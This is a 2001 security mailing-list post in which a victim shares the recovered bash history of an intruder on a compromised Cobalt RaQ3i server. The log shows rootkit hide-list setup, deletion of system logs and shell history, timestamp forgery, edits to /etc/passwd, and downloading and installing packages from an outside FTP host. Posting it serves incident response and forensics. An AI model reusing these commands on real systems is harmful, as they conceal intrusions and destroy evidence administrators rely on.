[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] Re: RaQ3i are still vulnerable AFTER BIND update..
- Subject: [cobalt-security] Re: RaQ3i are still vulnerable AFTER BIND update..
- From: "Paulos Putremos" <putremos@xxxxxxxxxxxxxx>
- Date: Fri, 17 Aug 2001 06:10:47 -0700
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Here goes, I'll warn you though it doesn't make pretty reading!
Any comments or advice on retrieving anything off the machine will be very much appreciated...
cat .bash_history
cd /tmp
cat /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinitrm -rf /usr/sbin/xntps
killall -9 xntps
grep -v "(NTPv3 daemon)" /etc/rc.d/rc.sysinit >> /tmp/.jgh5j4gh56k
touch -acmr /etc/rc.d/rc.sysinit /tmp/.jgh5j4gh56k
mv -f /tmp/.jgh5j4gh56k /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinit
echo "patching: removing anonymous ftpd access..."
grep -v "anonymous" /etc/ftpaccess >> /tmp/.HzG8hgfH
touch -acmr /etc/ftpaccess /tmp/.HzG8hgfH
mv -f /tmp/.HzG8hgfH /etc/ftpaccess
rm -rf /usr/sbin/xntps
killall -9 xntps
grep -v "(NTPv3 daemon)" /etc/rc.d/rc.sysinit >> /tmp/.jgh5j4gh56k
touch -acmr /etc/rc.d/rc.sysinit /tmp/.jgh5j4gh56k
mv -f /tmp/.jgh5j4gh56k /etc/rc.d/rc.sysinit
grep -v "/usr/sbin/xntps" /etc/rc.d/rc.sysinit >> /tmp/.jg5g4dg6f5g44
touch -acmr /etc/rc.d/rc.sysinit /tmp/.jg5g4dg6f5g44
mv -f /tmp/.jg5g4dg6f5g44 /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinit
echo "patching: removing anonymous ftpd access..."
grep -v "anonymous" /etc/ftpaccess >> /tmp/.HzG8hgfH
touch -acmr /etc/ftpaccess /tmp/.HzG8hgfH
mv -f /tmp/.HzG8hgfH /etc/ftpaccess
rm -rf /usr/sbin/xntps
killall -9 xntps
grep -v "(NTPv3 daemon)" /etc/rc.d/rc.sysinit >> /tmp/.jgh5j4gh56k
touch -acmr /etc/rc.d/rc.sysinit /tmp/.jgh5j4gh56k
mv -f /tmp/.jgh5j4gh56k /etc/rc.d/rc.sysinit
grep -v "/usr/sbin/xntps" /etc/rc.d/rc.sysinit >> /tmp/.jg5g4dg6f5g44
touch -acmr /etc/rc.d/rc.sysinit /tmp/.jg5g4dg6f5g44
mv -f /tmp/.jg5g4dg6f5g44 /etc/rc.d/rc.sysinit
rm -rf /dev/ptyr
rm -rf /dev/ptyq
rm -rf /dev/ptyp
rm -rf /dev/ptys
/usr/sbin/pwunconv
rm -rf /usr/src/.puta/.1addr
rm -rf /usr/src/.puta/.1file
rm -rf /usr/src/.puta/.1logz
rm -rf /usr/src/.puta/.1proc
ps aux
cat > /etc/services
cat > /etc/inetd.conf
echo Mail >> /usr/src/.puta/.1file
echo cdrom >> /usr/src/.puta/.1file
echo 2 209 >> /usr/src/.puta/.1addr
echo 2 208 >> /usr/src/.puta/.1addr
echo 2 64 >> /usr/src/.puta/.1addr
echo 2 150 >> /usr/src/.puta/.1addr
echo 163 >> /usr/src/.puta/.1logz
echo 2 150 >> /usr/src/.puta/.1addr
echo 2 158 >> /usr/src/.puta/.1addr
echo 2 151 >> /usr/src/.puta/.1addr
echo 2 129 >> /usr/src/.puta/.1addr
echo 2 65 >> /usr/src/.puta/.1addr
echo 2 199 >> /usr/src/.puta/.1addr
echo 2 148 >> /usr/src/.puta/.1addr
echo 2 63 >> /usr/src/.puta/.1addr
echo 2 192 >> /usr/src/.puta/.1addr
echo 2 161 >> /usr/src/.puta/.1addr
echo 2 156 >> /usr/src/.puta/.1addr
echo 2 196 >> /usr/src/.puta/.1addr
echo 2 149 >> /usr/src/.puta/.1addr
echo 2 141 >> /usr/src/.puta/.1addr
echo 2 61 >> /usr/src/.puta/.1addr
echo 2 199 >> /usr/src/.puta/.1addr
echo 2 216 >> /usr/src/.puta/.1addr
echo 2 130 >> /usr/src/.puta/.1addr
echo 2 207 >> /usr/src/.puta/.1addr
echo 2 164 >> /usr/src/.puta/.1addr
echo 2 139 >> /usr/src/.puta/.1addr
echo 2 203 >> /usr/src/.puta/.1addr
echo 2 212 >> /usr/src/.puta/.1addr
echo 2 210 >> /usr/src/.puta/.1addr
echo 2 211 >> /usr/src/.puta/.1addr
echo 2 206 >> /usr/src/.puta/.1addr
echo 2 202 >> /usr/src/.puta/.1addr
echo 2 195 >> /usr/src/.puta/.1addr
echo 2 24 >> /usr/src/.puta/.1addr
echo 2 194 >> /usr/src/.puta/.1addr
echo 2 193 >> /usr/src/.puta/.1addr
echo 2 147 >> /usr/src/.puta/.1addr
echo 2 166 >> /usr/src/.puta/.1addr
echo 2 213 >> /usr/src/.puta/.1addr
echo 2 163 >> /usr/src/.puta/.1addr
echo 4 6667 >> /usr/src/.puta/.1addr
echo 4 6669 >> /usr/src/.puta/.1addr
echo 4 5550 >> /usr/src/.puta/.1addr
echo 4 110 >> /usr/src/.puta/.1addr
echo 4 109 >> /usr/src/.puta/.1addr
echo 4 53 >> /usr/src/.puta/.1addr
echo 4 23 >> /usr/src/.puta/.1addr
echo 3 8888 >> /usr/src/.puta/.1addr
echo 2 eggdrop >> /usr/src/.puta/.1proc
echo 2 screen >> /usr/src/.puta/.1proc
echo 2 SCREEN >> /usr/src/.puta/.1proc
echo 2 synscan >> /usr/src/.puta/.1proc
echo 2 syn >> /usr/src/.puta/.1proc
echo 2 zombie >> /usr/src/.puta/.1proc
echo 2 grep >> /usr/src/.puta/.1proc
echo 2 login >> /usr/src/.puta/.1proc
echo 2 sshd2 >> /usr/src/.puta/.1proc
echo 2 gazda >> /usr/src/.puta/.1proc
echo 2 login >> /usr/src/.puta/.1proc
echo 2 gazda >> /usr/src/.puta/.1proc
echo 2 psybnc >> /usr/src/.puta/.1proc
echo 2 astatd >> /usr/src/.puta/.1proc
echo 2 pscan >> /usr/src/.puta/.1proc
echo 2 bot >> /usr/src/.puta/.1proc
echo 2 screen >> /usr/src/.puta/.1proc
echo 2 in.identd >> /usr/src/.puta/.1proc
echo 2 pump >> /usr/src/.puta/.1proc
echo 2 nscd >> /usr/src/.puta/.1proc
echo 2 t0rns >> /usr/src/.puta/.1proc
echo 2 g >> /usr/src/.puta/.1proc
echo 2 pop >> /usr/src/.puta/.1proc
echo 2 mq >> /usr/src/.puta/.1proc
echo 2 sh >> /usr/src/.puta/.1proc
echo 2 z0ne >> /usr/src/.puta/.1proc
echo 2 rdns >> /usr/src/.puta/.1proc
echo 3 eggdrop >> /usr/src/.puta/.1proc
echo 2 ircd >> /usr/src/.puta/.1proc
echo 3 ircd >> /usr/src/.puta/.1proc
echo 2 localtime >> /usr/src/.puta/.1proc
echo 3 localtime >> /usr/src/.puta/.1proc
echo 3 screen >> /usr/src/.puta/.1proc
echo 3 SCREEN >> /usr/src/.puta/.1proc
echo 3 synscan >> /usr/src/.puta/.1proc
echo 3 syn >> /usr/src/.puta/.1proc
echo 3 zombie >> /usr/src/.puta/.1proc
echo 3 grep >> /usr/src/.puta/.1proc
echo 3 login >> /usr/src/.puta/.1proc
echo 3 gazda >> /usr/src/.puta/.1proc
echo 3 telnet >> /usr/src/.puta/.1proc
echo 3 login >> /usr/src/.puta/.1proc
echo 3 gazda >> /usr/src/.puta/.1proc
echo 3 bind >> /usr/src/.puta/.1proc
echo 3 psybnc >> /usr/src/.puta/.1proc
echo 3 astatd >> /usr/src/.puta/.1proc
echo 3 astatd.a >> /usr/src/.puta/.1proc
echo 3 pscan >> /usr/src/.puta/.1proc
echo 3 screen >> /usr/src/.puta/.1proc
echo 3 in.identd >> /usr/src/.puta/.1proc
echo 3 pump >> /usr/src/.puta/.1proc
echo 3 nscd >> /usr/src/.puta/.1proc
echo 3 t0rns >> /usr/src/.puta/.1proc
echo 3 g >> /usr/src/.puta/.1proc
echo 3 pop >> /usr/src/.puta/.1proc
echo 3 mq >> /usr/src/.puta/.1proc
echo 3 sh >> /usr/src/.puta/.1proc
echo 3 z0ne >> /usr/src/.puta/.1proc
echo 3 rdns >> /usr/src/.puta/.1proc
rm -rf /var/log/messages
rm -rf /var/log/secure
rm -rf /var/log/wtmp
rm -rf /root/.bash_history
rm -rf /var/log/maillog
rm -rf /var/log/lastlog
rm -rf /var/spool/mail
echo >> /var/log/messages
echo >> /var/log/secure
echo >> /root/.bash_history
echo >> /var/log/wtmp
echo >> /var/log/maillog
echo >> /var/log/lastlog
chmod 600 /var/log/secure
chmod 600 /var/log/maillog
chmod 600 /root/.bash_history
rm -rf /tmp/*
rm -rf /tmp/.*
pico /etc/passwd
grep pico /etc/passwd /etc/passwd
pico /etc/passwd
/usr/sbin/pwconv
killall -HUP inetd
/usr/sbin/inetd
rm -rf /etc/passwd-
rm -rf /etc/passwd.*
/bin/ls -alg /etc/pass*
telnet localhost 6635
wget ftp://195.220.108.108/linux/redhat/6.2/en/os/i386/RedHat/RPMS//bzip2-0.9.5d-2.i386.rpm
wget ftp://195.220.108.108/linux/redhat/updates/6.2/en/os/i386//popt-1.6.2-6x.i386.rpm
wget ftp://195.220.108.108/linux/redhat/updates/6.2/en/os/i386//db3-3.1.17-4.6x.i386.rpm
wget ftp://195.220.108.108/linux/redhat/updates/6.2/en/os/i386//rpm-4.0.2-6x.i386.rpm
wget ftp://195.220.108.108/linux/redhat/updates/6.2/en/os/i386//glibc-2.1.3-22.i386.rpm
wget ftp://195.220.108.108/linux/redhat/6.2/en/os/i386/RedHat/RPMS//utempter-0.5.2-2.i386.rpm
wget ftp://195.220.108.108/linux/redhat/6.2/en/os/i386/RedHat/RPMS//screen-3.9.5-4.i386.rpm
wget ftp://195.220.108.108/linux/redhat/updates/6.2/en/os/i386//bind-8.2.3-0.6.x.i386.rpm
wget ftp://195.220.108.108/linux/rawhide/1.0/i386/RedHat/RPMS/wget-1.7-1.i386.rpm
wget ftp://195.220.108.108/linux/contrib/libc6/i386//wu-ftpd-2.6.1-3.6x.i386.rpm
wget ftp://195.220.108.108/linux/redhat/updates/6.2/en/os/i386//lpr-0.50-7.6.x.i386.rpm
rpm -Uvh bzip2-0.9.5d-2.i386.rpm
rpm -Uvh popt-1.6.2-6x.i386.rpm
rpm -Uvh db3-3.1.17-4.6x.i386.rpm
rpm -Uvh rpm-4.0.2-6x.i386.rpm
rpm -Uvh glibc-2.1.3-22.i386.rpm
rpm -Uvh utempter-0.5.2-2.i386.rpm
rpm -Uvh screen-3.9.5-4.i386.rpm
rpm -Uvh bind-8.2.3-0.6.x.i386.rpm
rpm -Uvh wget-1.7-1.i386.rpm
rpm -Uvh wu-ftpd-2.6.1-3.6x.i386.rpm
rpm -Uvh lpr-0.50-7.6.x.i386.rpm
killall -9 named
/usr/sbin/named
echo "patching: removing anonymous ftpd access..."
grep -v "anonymous" /etc/ftpaccess >> /tmp/.HzG8hgfH
touch -acmr /etc/ftpaccess /tmp/.HzG8hgfH
mv -f /tmp/.HzG8hgfH /etc/ftpaccess
rm -rf /usr/sbin/xntps
killall -9 xntps
grep -v "(NTPv3 daemon)" /etc/rc.d/rc.sysinit >> /tmp/.jgh5j4gh56k
touch -acmr /etc/rc.d/rc.sysinit /tmp/.jgh5j4gh56k
mv -f /tmp/.jgh5j4gh56k /etc/rc.d/rc.sysinit
grep -v "/usr/sbin/xntps" /etc/rc.d/rc.sysinit >> /tmp/.jg5g4dg6f5g44
touch -acmr /etc/rc.d/rc.sysinit /tmp/.jg5g4dg6f5g44
mv -f /tmp/.jg5g4dg6f5g44 /etc/rc.d/rc.sysinit
cd /tmp
rm -rf *
/usr/sbin/named -v
/usr/sbin/named -v
exit
> "Kevin D" <kdlists@xxxxxxxxxxxxxxx> <putremos@xxxxxxxxxxxxxx> Re: RaQ3i are still vulnerable AFTER BIND update..Date: Fri, 17 Aug 2001 09:06:07 -0400
>
>From: "Paulos Putremos" <putremos@xxxxxxxxxxxxxx>
>> if anyone is interested (or even listening to me at all) i can send the
>.bash_history which shows what this bugger was up to.
>>
>> Any advice is much appreciated
>
>Send it!
>
>Kevin
------------------------------------------------------------
Email account furnished courtesy of AntiOnline - http://www.AntiOnline.com
AntiOnline - The Internet's Information Security Super Center!